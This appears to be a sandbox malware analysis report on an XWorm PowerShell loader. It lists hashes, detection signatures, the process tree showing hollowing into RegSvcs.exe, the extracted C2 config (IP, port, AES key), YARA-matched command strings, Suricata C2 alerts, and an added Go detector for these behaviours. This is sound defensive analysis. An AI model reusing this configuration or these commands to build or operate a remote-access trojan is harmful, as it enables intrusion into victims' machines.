Windows Analysis Report
176.113.115.170.ps1

Overview

General Information

Sample name: 176.113.115.170.ps1
Analysis ID: 1589116
MD5: be3bf7a258359bd7c14c47b3872c9531
SHA1: be71f346690b8f384961bf73b382181c5959aef6
SHA256: ef9aeef4f3b7ea00add3168043c866716d72353065d95b7b7dd981641d91f1ae
Tags: 176-113-115-170bookingdafeytv-1985-nzxps1sputnik-1985-comuser-JAMESWT_MHT

Detection

XWorm
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected XWorm
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Injects a PE file into a foreign process
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected non-DNS traffic on DNS port
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Tries to resolve domain names, but no domain seems valid (expired dropper behavior)
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • powershell.exe (PID: 6212 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\176.113.115.170.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 2616 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • RegSvcs.exe (PID: 5916 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • cleanup
Malware configuration (XWorm): {"C2 url": ["176.113.115.170"], "Port": 4413, "Aes key": "P0WER", "SPL": "<Xwormmm>", "Install file": "USB.exe"}
Source | Rule | Description | Author | Strings
00000004.00000002.4599580483.0000000000402000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
00000004.00000002.4599580483.0000000000402000.00000040.00000400.00020000.00000000.sdmp | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen
  • 0xd8a8:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0xd945:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0xda5a:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0xd5ca:$cnc4: POST / HTTP/1.1
00000000.00000002.2176808391.00000272C8338000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
00000000.00000002.2176808391.00000272C8338000.00000004.00000800.00020000.00000000.sdmp | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen
  • 0x1e5d88:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x1e5e25:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x1e5f3a:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x1e5aaa:$cnc4: POST / HTTP/1.1
00000004.00000002.4602069270.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
Source | Rule | Description | Author | Strings
4.2.RegSvcs.exe.400000.0.unpack | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
4.2.RegSvcs.exe.400000.0.unpack | rat_win_xworm_v3 | Finds XWorm (version XClient, v3) samples based on characteristic strings | Sekoia.io
  • 0xb59a:$str01: $VB$Local_Port
  • 0xb5be:$str02: $VB$Local_Host
  • 0x975c:$str03: get_Jpeg
  • 0x9edd:$str04: get_ServicePack
  • 0xc5fa:$str05: Select * from AntivirusProduct
  • 0xcf30:$str06: PCRestart
  • 0xcf44:$str07: shutdown.exe /f /r /t 0
  • 0xcff6:$str08: StopReport
  • 0xcfcc:$str09: StopDDos
  • 0xd0c2:$str10: sendPlugin
  • 0xd142:$str11: OfflineKeylogger Not Enabled
  • 0xd29a:$str12: -ExecutionPolicy Bypass -File "
  • 0xd8af:$str13: Content-length: 5235
0.2.powershell.exe.272c85102e0.1.unpack | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
4.2.RegSvcs.exe.400000.0.unpack | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen
  • 0xdaa8:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0xdb45:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0xdc5a:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0xd7ca:$cnc4: POST / HTTP/1.1
0.2.powershell.exe.272c85102e0.1.unpack | rat_win_xworm_v3 | Finds XWorm (version XClient, v3) samples based on characteristic strings | Sekoia.io
  • 0x979a:$str01: $VB$Local_Port
  • 0x97be:$str02: $VB$Local_Host
  • 0x795c:$str03: get_Jpeg
  • 0x80dd:$str04: get_ServicePack
  • 0xa7fa:$str05: Select * from AntivirusProduct
  • 0xb130:$str06: PCRestart
  • 0xb144:$str07: shutdown.exe /f /r /t 0
  • 0xb1f6:$str08: StopReport
  • 0xb1cc:$str09: StopDDos
  • 0xb2c2:$str10: sendPlugin
  • 0xb342:$str11: OfflineKeylogger Not Enabled
  • 0xb49a:$str12: -ExecutionPolicy Bypass -File "
  • 0xbaaf:$str13: Content-length: 5235

            System Summary

Source: Process started | Author: frack113 | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\176.113.115.170.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\176.113.115.170.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\176.113.115.170.ps1", ProcessId: 6212, ProcessName: powershell.exe
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\176.113.115.170.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\176.113.115.170.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\176.113.115.170.ps1", ProcessId: 6212, ProcessName: powershell.exe
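The Sigma hits above and the process tree (powershell.exe started with -ExecutionPolicy unrestricted, then a RegSvcs.exe child with nothing but its own path on the command line, which together with the "Creates a process in suspended mode" and "Injects a PE file" signatures is the shape of process hollowing) reduce to two host-side checks. The Go program below is an added example, not part of the Joe Sandbox report and not a Sigma rule; the event rows reconstruct the PIDs and command lines shown on this page (parent 4004, then 6212, 2616, 5916) and add two constructed benign rows (7001, 7002), and the hollowing targets beyond RegSvcs.exe (RegAsm.exe, InstallUtil.exe, MSBuild.exe) are a generalisation of what this report shows.

```go
package main

import (
	"fmt"
	"path/filepath"
	"strings"
)

// ProcEvent is a minimal process-creation record, the fields a Sysmon
// event 1 or a Windows 4688 event would give a detection pipeline.
type ProcEvent struct {
	PID, PPID   int
	Image       string
	CommandLine string
}

// Finding names the rule that fired and the offending PID.
type Finding struct {
	PID  int
	Rule string
}

// Signed .NET framework utilities that, when a script host starts them with
// an empty command line, are the usual hosts for hollowed payloads.
// RegSvcs.exe is the one in this report; the other three are a generalisation.
var hollowTargets = map[string]bool{
	"regsvcs.exe": true, "regasm.exe": true, "installutil.exe": true, "msbuild.exe": true,
}

// imageName lower-cases the file name of a Windows path (works on any OS).
func imageName(image string) string {
	return strings.ToLower(filepath.Base(strings.ReplaceAll(image, `\`, "/")))
}

func isPowerShell(image string) bool {
	n := imageName(image)
	return n == "powershell.exe" || n == "pwsh.exe"
}

// isExecPolicyFlag accepts -ExecutionPolicy, the unambiguous prefixes
// PowerShell itself accepts (-ex, -exec, ...) and the common -ep shorthand.
func isExecPolicyFlag(tok string) bool {
	tok = strings.ToLower(tok)
	return tok == "-ep" || (len(tok) >= 3 && strings.HasPrefix("-executionpolicy", tok))
}

// InsecureExecPolicy is the check behind the Sigma hit on this page:
// powershell.exe launched with -ExecutionPolicy Unrestricted or Bypass.
func InsecureExecPolicy(e ProcEvent) bool {
	if !isPowerShell(e.Image) {
		return false
	}
	// Whitespace tokenising splits quoted paths that contain spaces; that is
	// harmless here because only flag/value pairs are inspected.
	toks := strings.Fields(e.CommandLine)
	for i := 0; i+1 < len(toks); i++ {
		if isExecPolicyFlag(toks[i]) {
			switch strings.ToLower(toks[i+1]) {
			case "unrestricted", "bypass":
				return true
			}
		}
	}
	return false
}

// ArglessDotNetHostFromPowerShell flags the shape of the RegSvcs.exe child
// in this report: a hollowing target spawned by PowerShell with nothing but
// its own path on the command line (a real RegSvcs run names an assembly).
func ArglessDotNetHostFromPowerShell(e ProcEvent, parent *ProcEvent) bool {
	if parent == nil || !hollowTargets[imageName(e.Image)] || !isPowerShell(parent.Image) {
		return false
	}
	return len(strings.Fields(e.CommandLine)) <= 1
}

// Analyse runs both checks over a batch of events, resolving parents by PID.
func Analyse(events []ProcEvent) []Finding {
	byPID := make(map[int]*ProcEvent, len(events))
	for i := range events {
		byPID[events[i].PID] = &events[i]
	}
	var out []Finding
	for _, e := range events {
		if InsecureExecPolicy(e) {
			out = append(out, Finding{e.PID, "powershell_insecure_executionpolicy"})
		}
		if ArglessDotNetHostFromPowerShell(e, byPID[e.PPID]) {
			out = append(out, Finding{e.PID, "dotnet_utility_spawned_argless_by_powershell"})
		}
	}
	return out
}

// SampleEvents reproduces the process tree from this report (parent PID 4004,
// then 6212, 2616, 5916) and adds two constructed benign rows (7001, 7002).
func SampleEvents() []ProcEvent {
	ps := `C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe`
	regsvcs := `C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe`
	return []ProcEvent{
		{6212, 4004, ps, `"` + ps + `" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\176.113.115.170.ps1"`},
		{2616, 6212, `C:\Windows\system32\conhost.exe`, `C:\Windows\system32\conhost.exe 0xffffffff -ForceV1`},
		{5916, 6212, regsvcs, `"` + regsvcs + `"`},
		{7001, 4004, ps, `"` + ps + `" -ExecutionPolicy RemoteSigned -File "C:\Scripts\backup.ps1"`}, // constructed, benign
		{7002, 7003, regsvcs, `"` + regsvcs + `" "C:\Program Files\App\Component.dll"`},            // constructed, benign
	}
}

func main() {
	for _, f := range Analyse(SampleEvents()) {
		fmt.Printf("PID %d: %s\n", f.PID, f.Rule)
	}
}
```

Run as written it reports PID 6212 for the execution-policy check and PID 5916 for the argless RegSvcs.exe child; the RemoteSigned launch and the RegSvcs.exe run that names an assembly stay quiet. The parent check is what keeps the second rule useful: RegSvcs.exe is started legitimately by installers, but not by a script host with no assembly to register.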
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-01-11T10:03:15.710239+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.113.115.170 | 4413 | 192.168.2.6 | 49718 | TCP
2025-01-11T10:03:23.819884+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.113.115.170 | 4413 | 192.168.2.6 | 49718 | TCP
2025-01-11T10:03:37.285229+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.113.115.170 | 4413 | 192.168.2.6 | 49718 | TCP
2025-01-11T10:03:45.707942+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.113.115.170 | 4413 | 192.168.2.6 | 49718 | TCP
2025-01-11T10:03:50.755229+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.113.115.170 | 4413 | 192.168.2.6 | 49718 | TCP
2025-01-11T10:04:04.223272+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.113.115.170 | 4413 | 192.168.2.6 | 49718 | TCP
2025-01-11T10:04:15.728135+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.113.115.170 | 4413 | 192.168.2.6 | 49718 | TCP
2025-01-11T10:04:17.693170+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.113.115.170 | 4413 | 192.168.2.6 | 49718 | TCP
2025-01-11T10:04:19.363812+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.113.115.170 | 4413 | 192.168.2.6 | 49718 | TCP
2025-01-11T10:04:19.485113+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.113.115.170 | 4413 | 192.168.2.6 | 49718 | TCP
2025-01-11T10:04:30.848378+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.113.115.170 | 4413 | 192.168.2.6 | 49718 | TCP
2025-01-11T10:04:39.832693+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.113.115.170 | 4413 | 192.168.2.6 | 49718 | TCP
2025-01-11T10:04:45.348369+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.113.115.170 | 4413 | 192.168.2.6 | 49718 | TCP
2025-01-11T10:04:45.732510+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.113.115.170 | 4413 | 192.168.2.6 | 49718 | TCP
2025-01-11T10:04:47.586686+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.113.115.170 | 4413 | 192.168.2.6 | 49718 | TCP
2025-01-11T10:04:49.945635+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.113.115.170 | 4413 | 192.168.2.6 | 49718 | TCP
2025-01-11T10:04:50.075448+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.113.115.170 | 4413 | 192.168.2.6 | 49718 | TCP
2025-01-11T10:04:50.196498+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.113.115.170 | 4413 | 192.168.2.6 | 49718 | TCP
2025-01-11T10:04:55.313184+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.113.115.170 | 4413 | 192.168.2.6 | 49718 | TCP
2025-01-11T10:05:01.272151+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.113.115.170 | 4413 | 192.168.2.6 | 49718 | TCP
2025-01-11T10:05:01.395541+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.113.115.170 | 4413 | 192.168.2.6 | 49718 | TCP
2025-01-11T10:05:07.723496+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.113.115.170 | 4413 | 192.168.2.6 | 49718 | TCP
2025-01-11T10:05:15.747681+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.113.115.170 | 4413 | 192.168.2.6 | 49718 | TCP
2025-01-11T10:05:21.197542+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.113.115.170 | 4413 | 192.168.2.6 | 49718 | TCP
2025-01-11T10:05:24.708086+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.113.115.170 | 4413 | 192.168.2.6 | 49718 | TCP
2025-01-11T10:05:28.051668+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.113.115.170 | 4413 | 192.168.2.6 | 49718 | TCP
2025-01-11T10:05:33.464028+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.113.115.170 | 4413 | 192.168.2.6 | 49718 | TCP
2025-01-11T10:05:34.149677+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.113.115.170 | 4413 | 192.168.2.6 | 49718 | TCP
2025-01-11T10:05:45.767809+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.113.115.170 | 4413 | 192.168.2.6 | 49718 | TCP
2025-01-11T10:05:47.613889+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.113.115.170 | 4413 | 192.168.2.6 | 49718 | TCP
2025-01-11T10:05:55.274630+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.113.115.170 | 4413 | 192.168.2.6 | 49718 | TCP
2025-01-11T10:06:06.379585+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.113.115.170 | 4413 | 192.168.2.6 | 49718 | TCP
2025-01-11T10:06:15.784852+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.113.115.170 | 4413 | 192.168.2.6 | 49718 | TCP
2025-01-11T10:06:19.851542+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.113.115.170 | 4413 | 192.168.2.6 | 49718 | TCP
2025-01-11T10:06:33.347246+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.113.115.170 | 4413 | 192.168.2.6 | 49718 | TCP
2025-01-11T10:06:43.801919+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.113.115.170 | 4413 | 192.168.2.6 | 49718 | TCP
2025-01-11T10:06:45.797759+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.113.115.170 | 4413 | 192.168.2.6 | 49718 | TCP
2025-01-11T10:06:47.383427+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.113.115.170 | 4413 | 192.168.2.6 | 49718 | TCP
2025-01-11T10:06:47.554173+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.113.115.170 | 4413 | 192.168.2.6 | 49718 | TCP
2025-01-11T10:06:47.846791+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.113.115.170 | 4413 | 192.168.2.6 | 49718 | TCP
2025-01-11T10:06:48.222026+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.113.115.170 | 4413 | 192.168.2.6 | 49718 | TCP
2025-01-11T10:06:51.492933+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.113.115.170 | 4413 | 192.168.2.6 | 49718 | TCP
2025-01-11T10:06:52.317426+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.113.115.170 | 4413 | 192.168.2.6 | 49718 | TCP
2025-01-11T10:06:53.489179+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.113.115.170 | 4413 | 192.168.2.6 | 49718 | TCP
2025-01-11T10:06:53.609907+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.113.115.170 | 4413 | 192.168.2.6 | 49718 | TCP
2025-01-11T10:06:55.380815+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.113.115.170 | 4413 | 192.168.2.6 | 49718 | TCP
2025-01-11T10:07:00.584845+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.113.115.170 | 4413 | 192.168.2.6 | 49718 | TCP
2025-01-11T10:07:04.006405+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.113.115.170 | 4413 | 192.168.2.6 | 49718 | TCP
2025-01-11T10:07:04.133440+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.113.115.170 | 4413 | 192.168.2.6 | 49718 | TCP
2025-01-11T10:07:04.250902+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.113.115.170 | 4413 | 192.168.2.6 | 49718 | TCP
2025-01-11T10:07:04.831267+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.113.115.170 | 4413 | 192.168.2.6 | 49718 | TCP
2025-01-11T10:07:10.590896+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.113.115.170 | 4413 | 192.168.2.6 | 49718 | TCP
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-01-11T10:03:23.833659+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49718 | 176.113.115.170 | 4413 | TCP
2025-01-11T10:03:37.287933+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49718 | 176.113.115.170 | 4413 | TCP
2025-01-11T10:03:50.757217+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49718 | 176.113.115.170 | 4413 | TCP
2025-01-11T10:04:04.226679+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49718 | 176.113.115.170 | 4413 | TCP
2025-01-11T10:04:17.694906+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49718 | 176.113.115.170 | 4413 | TCP
2025-01-11T10:04:19.367649+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49718 | 176.113.115.170 | 4413 | TCP
2025-01-11T10:04:19.487034+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49718 | 176.113.115.170 | 4413 | TCP
2025-01-11T10:04:30.855002+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49718 | 176.113.115.170 | 4413 | TCP
2025-01-11T10:04:39.835523+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49718 | 176.113.115.170 | 4413 | TCP
2025-01-11T10:04:45.351079+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49718 | 176.113.115.170 | 4413 | TCP
2025-01-11T10:04:47.588963+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49718 | 176.113.115.170 | 4413 | TCP
2025-01-11T10:04:49.949996+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49718 | 176.113.115.170 | 4413 | TCP
2025-01-11T10:04:50.089397+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49718 | 176.113.115.170 | 4413 | TCP
2025-01-11T10:04:50.203852+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49718 | 176.113.115.170 | 4413 | TCP
2025-01-11T10:04:55.315587+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49718 | 176.113.115.170 | 4413 | TCP
2025-01-11T10:05:01.274287+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49718 | 176.113.115.170 | 4413 | TCP
2025-01-11T10:05:01.397754+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49718 | 176.113.115.170 | 4413 | TCP
2025-01-11T10:05:07.725209+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49718 | 176.113.115.170 | 4413 | TCP
2025-01-11T10:05:21.199697+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49718 | 176.113.115.170 | 4413 | TCP
2025-01-11T10:05:24.710811+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49718 | 176.113.115.170 | 4413 | TCP
2025-01-11T10:05:28.064303+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49718 | 176.113.115.170 | 4413 | TCP
2025-01-11T10:05:33.465784+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49718 | 176.113.115.170 | 4413 | TCP
2025-01-11T10:05:34.154960+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49718 | 176.113.115.170 | 4413 | TCP
2025-01-11T10:05:47.615192+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49718 | 176.113.115.170 | 4413 | TCP
2025-01-11T10:05:55.404050+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49718 | 176.113.115.170 | 4413 | TCP
2025-01-11T10:06:06.384569+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49718 | 176.113.115.170 | 4413 | TCP
2025-01-11T10:06:19.852832+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49718 | 176.113.115.170 | 4413 | TCP
2025-01-11T10:06:33.411931+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49718 | 176.113.115.170 | 4413 | TCP
2025-01-11T10:06:43.803194+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49718 | 176.113.115.170 | 4413 | TCP
2025-01-11T10:06:47.385515+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49718 | 176.113.115.170 | 4413 | TCP
2025-01-11T10:06:47.555629+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49718 | 176.113.115.170 | 4413 | TCP
2025-01-11T10:06:47.848083+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49718 | 176.113.115.170 | 4413 | TCP
2025-01-11T10:06:48.227167+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49718 | 176.113.115.170 | 4413 | TCP
2025-01-11T10:06:51.610033+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49718 | 176.113.115.170 | 4413 | TCP
2025-01-11T10:06:52.319100+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49718 | 176.113.115.170 | 4413 | TCP
2025-01-11T10:06:53.490802+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49718 | 176.113.115.170 | 4413 | TCP
2025-01-11T10:06:53.611322+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49718 | 176.113.115.170 | 4413 | TCP
2025-01-11T10:06:55.382570+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49718 | 176.113.115.170 | 4413 | TCP
2025-01-11T10:07:00.587025+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49718 | 176.113.115.170 | 4413 | TCP
2025-01-11T10:07:04.007680+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49718 | 176.113.115.170 | 4413 | TCP
2025-01-11T10:07:04.134457+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49718 | 176.113.115.170 | 4413 | TCP
2025-01-11T10:07:04.255218+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49718 | 176.113.115.170 | 4413 | TCP
2025-01-11T10:07:04.375196+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49718 | 176.113.115.170 | 4413 | TCP
2025-01-11T10:07:04.383325+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49718 | 176.113.115.170 | 4413 | TCP
2025-01-11T10:07:04.833348+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49718 | 176.113.115.170 | 4413 | TCP
2025-01-11T10:07:10.591417+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49718 | 176.113.115.170 | 4413 | TCP
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-01-11T10:03:15.710239+0100 | 2858801 | 1 | Malware Command and Control Activity Detected | 176.113.115.170 | 4413 | 192.168.2.6 | 49718 | TCP
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-01-11T10:06:33.133470+0100 | 2858799 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49718 | 176.113.115.170 | 4413 | TCP


            AV Detection

Source: 0.2.powershell.exe.272c9328660.2.raw.unpack | Malware Configuration Extractor: Xworm {"C2 url": ["176.113.115.170"], "Port": 4413, "Aes key": "P0WER", "SPL": "<Xwormmm>", "Install file": "USB.exe"}
Source: 176.113.115.170.ps1 | Virustotal: Detection: 9%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: 0.2.powershell.exe.272c9328660.2.raw.unpack | String decryptor: 176.113.115.170
Source: 0.2.powershell.exe.272c9328660.2.raw.unpack | String decryptor: 4413
Source: 0.2.powershell.exe.272c9328660.2.raw.unpack | String decryptor: P0WER
